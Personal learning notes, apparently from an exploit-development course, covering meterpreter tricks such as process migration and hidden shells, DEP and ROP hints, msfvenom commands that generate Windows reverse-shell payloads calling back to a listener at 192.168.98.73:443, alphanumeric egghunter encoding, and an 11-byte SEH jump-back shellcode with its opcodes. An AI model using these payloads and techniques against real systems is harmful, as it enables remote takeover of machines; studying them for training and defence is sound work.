COurse Flashcards
Learning notes
msf nuggets
meterpreter crashing
- could be auto migrate
unset InitialAutoRunScript
or check in ‘show options advanced’
useful commands:
getuid - privelesges user
ps - processes
migrate [ps #] for migrating into, say, as system process
shell hidden from user in meterpreter
‘execute -f cmd -c -H’
‘interact 1’ (where 1 channel name) (does not work)
‘execute -f cmd -c -H -i’ to go direct into interact
DEP
If you can’t execute NOP’s when working out the exploit that is very likely DEP.
A ROP chain is the way forward then
If shell unreliable try exitfunc=thread
EXITFUNC=thread
msfencode modern syntax
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.98.73 LPORT=443 –format=exe > shell.exe
exercise 3 reverse shell proper syntax
cd /usr/share/framework2
./msfpayload win32_reverse LHOST=192.168.98.73 LPORT=443 R| hexdump -C
oneliner to get it clean
./msfpayload win32_reverse LHOST LPORT=443 R| hexdump -C |grep -v 0000011f |cut -d “ “ -f3-19|sed ‘s/ //g’ |tr -d ‘\n’
reboot windows from command line - good for working out ASLR
shutdown -r -t 1
msfencode alphanumeric modern usage
For encoding egghunters say or anything in alphanumeric
msfvenom -p generic/custom PAYLOADFILE=./egg.bin -e x86/alpha_mixed -f python
highlight changes in code in red
put in ‘int 3’ in assembler
aaron adams compact back jump
The code is shown below, and works based on the fact that after taking the original POP, POP, RETN to jump into the four byte space before the SEH Overwrite, another pointer to the same memory location exists three places down on the stack. We basically get this memory address into the ECX register, decrement the CH register by 1 three times (which has the affect of decreasing ECX by a total of 768 or three times 256 since CH represents the second least significant byte of ECX), and then JUMP to ECX. This moves us back 768 bytes from the location where the original POP, POP, RETN instruction lands, and gives us more than enough space to use most Windows shellcode. At 11 bytes it is also very compact and will fit into very small buffer areas.
“\x59\x59\x59\xfe\xcd\xfe\xcd\xfe\xcd\xff\xe1”
11 bytes
POP ECX \x59
POP ECX \x59
POP ECX \x59
DEC CH \xfe\xcd
DEC CH \xfe\xcd
DEC CH \xfe\xcd
JMP ECX \xff\xe1
This jumpcode takes up 11 bytes of space and we can place it in our buffer immediately after our SEH overwrite in order to get back into the section of the buffer before our SEH overwrite. We simply take 768 away from the offset we know to point to the four byte space before the SEH overwrite (962) to determine exactly where our jump will land - 194 bytes from the start of the buffer. We then rewrite our exploit to move our shellcode into the first area of the buffer (at the correct offset), and we add the jumpcode immediately after the SEH overwrite.
http://www.thegreycorner.com/2010/01/seh-stack-based-windows-buffer-overflow.html
- nice technique to jump back in short code via Aaron Adams - see p-99 - 100 in the pdf
http: //phrack.org/issues/62/7.html
usage
https://www.exploit-db.com/exploits/14651
stable raw reverse shell
msfvenom -a x86 –platform windows -p windows/shell_reverse_tcp lhost=192.168.98.73 lport=443 EXITFUNC=thread -f python
No encoder or badchars specified, outputting raw payload
Payload size: 324 bytes
Final size of python file: 1556 bytes
